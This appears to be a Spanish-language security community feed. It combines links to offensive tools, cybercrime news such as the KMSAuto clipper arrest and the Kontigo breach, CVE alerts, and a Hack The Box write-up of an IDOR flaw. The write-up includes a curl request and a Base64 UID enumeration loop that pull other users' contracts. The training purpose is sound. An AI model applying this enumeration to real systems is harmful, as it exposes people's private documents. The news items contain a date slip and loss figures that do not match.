Feliz año a todos 🥳

🥷🏼 𝗝𝗪𝗧 𝗔𝘂𝗱𝗶𝘁𝗼𝗿
A web pentesting tool that allows you to analyse and exploit bad implementations of JSON Web Tokens (JWT), commonly used in modern authentication systems:

👨🏽‍💻 https://github.com/dr34mhacks/jwtauditor

Cloumare
Finds origin servers of websites behind reverse proxies

🔗 https://github.com/mrh0wl/Cloudmare/

DELINCUENTES APROVECHARON EL DESCUIDO DURANTE FESTIVIDADES Y ROBARON 30 MILLONES DE EUROS (ALEMANIA)

Fuente: DW

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

HUMOR 😹

Síguenos @redseg
instagram.com/redseg_latam

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

https://github.com/Anonimo501/IDOR_Downloads/tree/main


📝 WRITE-UP COMPLETO – IDOR con referencias codificadas (Hack The Box)
1️⃣ Resumen ejecutivo
Se identificó una vulnerabilidad IDOR (Insecure Direct Object Reference) en la funcionalidad de descarga de contratos de empleados.
Aunque la aplicación no expone IDs en texto plano, utiliza codificación Base64 como referencia al objeto, lo cual no constituye un control de acceso.
Esto permitió enumerar y descargar contratos de otros empleados sin autorización, obteniendo finalmente la bandera:

HTB{***}

2️⃣ Alcance y objetivo


Aplicación: Employee Manager


Funcionalidad afectada: Descarga de contratos


Endpoint: /download.php


Objetivo: Descargar contratos de los primeros 20 empleados y localizar el archivo que contiene la bandera



3️⃣ Análisis inicial
Al acceder a:

http://SERVER_IP:PORT/contracts.php

Se observa una lista de contratos con un enlace a Employment_contract.pdf.

Al interceptar la petición con Burp Suite al descargar el contrato, se identifica:

POST /download.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

contract=MQ==

4️⃣ Análisis del código cliente (clave del ataque)
Revisando el código fuente HTML/JavaScript:

<script>
function downloadContract(uid) {
window.location = /download.php?contract=${encodeURIComponent(btoa(uid))};
}
</script>

🔍 Observaciones críticas


uid → identificador del empleado


btoa(uid) → Base64 encoding


No existe:


Validación de sesión


Verificación de propiedad del contrato


Control de acceso por usuario




👉 La referencia al objeto es predecible y controlable


5️⃣ Confirmación de la lógica de codificación
Se prueba manualmente:

echo -n 1 | base64

Resultado:

MQ==

Este valor coincide exactamente con el parámetro contract observado.

✔️ Confirmado:
contract = base64(uid)


6️⃣ Explotación (IDOR)
Descarga manual válida
⚠️ Importante: el backend requiere POST, no GET.

curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "contract=MQ==" \
-OJ \
http://94.237.61.202:56565/download.php

Esto descarga:

contract_c4ca4238a0b923820dcc509a6f75849b.pdf


7️⃣ Enumeración masiva
Dado que los UID son secuenciales, se enumeran los primeros 20 empleados:

for i in {1..20}; do
echo "UID $i → $(echo -n $i | base64)"
done

Cada valor se envía al endpoint /download.php, permitiendo descargar todos los contratos, incluidos los de otros usuarios.


8️⃣ Obtención del flag
Uno de los contratos descargados contiene la bandera, accesible con:

cat contract_*.pdf

📌 Flag:

HTB{h45h1n6_1d5_***}

9️⃣ Impacto


Acceso no autorizado a documentos sensibles


Exposición de información laboral


Escalada horizontal (usuario → otros usuarios)


Vulnerabilidad crítica en entornos reales (GDPR / datos personales)



🔐 Conclusión de seguridad

La codificación NO es un mecanismo de seguridad
Base64 ≠ autorización
Hash ≠ control de acceso

Os dejo por aqui el enlace de archivos PDF con mucha info de CPTS, AD y otros mas a quien interese saludos.

https://github.com/Anonimo501/CPTS-PDFs

Tambien comparto un script que busca CVEs con POC:

https://github.com/Anonimo501/search-cve
https://github.com/Anonimo501/cve_search

DETENIDO EL HACKER RESPONSABLE DEL MALWARE KMSAuto, QUE INFECTÓ 3 MILLONES DE SISTEMAS

Las autoridades surcoreanas han detenido y extraditado a un ciudadano lituano de 29 años en relación con una extensa campaña de malware distribuido bajo la apariencia de un activador ilegal de Windows y Office que facilitó el robo de criptomonedas por valor de más de 1,5 millones de euros.

El arrestado, identificado por la Agencia de Policía Nacional surcoreana fue localizado en Georgia tras una orden internacional coordinada por Interpol y posteriormente extraditado al país asiático para responder ante la justicia.

Entre abril de 2020 y enero de 2023, el sospechoso distribuyó un ejecutable malicioso camuflado como KMSAuto, una herramienta popular en entornos pirata para activar ilegalmente Windows y Office.

En realidad, aquel archivo estaba 'troyanizado' con un malware tipo clipper que vigilaba el portapapeles de los usuarios en busca de direcciones de criptomonedas y las sustituía automáticamente por otras controladas por el atacante durante transacciones legítimas.

El malware fue descargado aproximadamente 2,8 millones de veces en todo el mundo, afectando alrededor de 3.100 billeteras vinculadas a 8.400 transacciones manipuladas. Ocho víctimas confirmadas en Corea del Sur sufrieron pérdidas por cerca de 14.000 euros.

https://www.escudodigital.com/ciberseguridad/detenido-hacker-malware-kmsauto.html

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

🎯Nuevo reto CTF Disponible🎯 en @TheHackersLabs

🧩 Nombre: Cold Fear
📈 Dificultad: Avanzado
💻 Sistema Operativo: Linux
🛡️ Categoría: Seguridad Ofensiva

🔗 Acceso: https://labs.thehackerslabs.com/machines/162

Certificado OT gratis.

https://courses.redteamleaders.com/courses/a75c41eb-a725-4834-b188-da837cbbff88

🇻🇪 PLATAFORMA KONTIGO APP SUFRE CIBERATAQUE Y ROBAN FONDOS DE USUARIOS

Un comunicado oficial hoy 5 de enero sorprendio a usuarios de la reconocida plataforma, informando un incidente cibernético (ataque) que afectó sus sistemas.

Decenas de usuarios reportaban sobre la desaparición de sus fondos digitales.

Kontigo es una aplicación financiera (fintech) venezolana que funciona como una billetera digital en dólares digitales (USDC/USDT), permitiendo a los usuarios manejar dinero, ahorrar, cambiar divisas (Bolívares a dólares digitales), enviar y recibir remesas, pagar servicios y realizar compras en comercios asociados, todo con enfoque en la tecnología blockchain para la inclusión financiera y protección contra la inflación, ofreciendo una alternativa a la banca tradicional en Venezuela.

Síguenos @redseg
https://instagram.com/redseg_latam

🛡 CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

CASO CIBERATAQUE KONTIGO APP

Lunes 5 de Diciembre
Venezuela, 2:56 PM

Kontigo envia otro comunicado extraoficial indicando que la afectación de usuarios fueron 1.005 clientes y una suma de 340 mil dólares sustraídos por los ciberdelincuentes.

En conjunto con su equipo y especialistas externos están evaluando lo ocurrido para fortalecer las medidas de ciberseguridad en su plataforma.

El comunicado indica que todos los afectados recibirán el reembolso del dinero extraido en sus billeteras digitales.

Síguenos t.me/redseg
Instagram.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra la Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

CÓMO LA IA ESTÁ CAMBIANDO LA DEFENSA CIBERNÉTICA

Miércoles 7 de Enero
Hora: 6 PM Venezuela

Enlace de Acceso:
https://us06web.zoom.us/w/83288689067?tk=cQ4bbe5Y8pIYTTNErzbOSIjXGu8s6UV1tg7mrvEFXXE.DQkAAAATZGSJqxZyaXotc3pUOVFGcUdyXy14QlJxUGN3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&uuid=WN_arIerzkcSdKpzBHi20uaqQ

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

⚠️Vulnerabilidad crítica de ejecución remota de comandos en routers D-Link descontinuados -- CVE-2026-0625
https://www.linkedin.com/posts/manuel-mart%C3%ADnez-casasola-55b245289_cve2026-zeroday-rce-activity-7414957185396338688-WFg3

¿SE INTERRUMPIÓ EL INTERNET EN VENEZUELA EL 3 DE ENERO?

Netblocks una organización no gubernamental que se especializa en rastrear en tiempo real las interrupciones del servicio de internet, la censura digital y los cortes de energía en todo el mundo, publicó en su cuenta en "X" un incidente cibernético ocurrido el 3 de enero del 2026 en Caracas-Venezuela, confirmando la afectación parcial del intermet que coincidió con la operación militar estadounidense.

La pérdida de conectividad se relacionó con cortes de energía a gran escala en toda la capital Venezolana. Las métricas de NetBlocks mostraron una caída significativa del tráfico web, lo que, según los expertos, podría deberse a un ataque de denegación de servicio distribuido (DDoS) destinado a interrumpir las comunicaciones.

La interrupción del servicio ocurrió durante la Operación Resolución Absoluta, una misión militar estadounidense que implicó ataques aéreos a la infraestructura militar, telecomunicaciones y servicios de energia eléctrica en la capital venezolana.

Autoridades oficiales americanas confirmaron que el Comando Cibernético de EE. UU. utilizó capacidades cibernéticas especializadas para la ejecución de la operación.

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

⚠️ Vulnerabilidad crítica de ejecución remota de código en n8n — CVE-2026-21858

https://www.linkedin.com/posts/manuel-mart%C3%ADnez-casasola-55b245289_cve2026-rce-n8n-activity-7415047845998952448-zi1N

KONTIGO REPORTA ESTE JUEVES OTRO CIBERATAQUE

Tras la afectación en más de 1000 usuarios y la perdida de casi medio millón en USTD, la popular plataforma de intercambio financiera Kontigo ha reportado la mañana de este jueves 8 de enero, otro intento de acceso a sus sistemas.

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org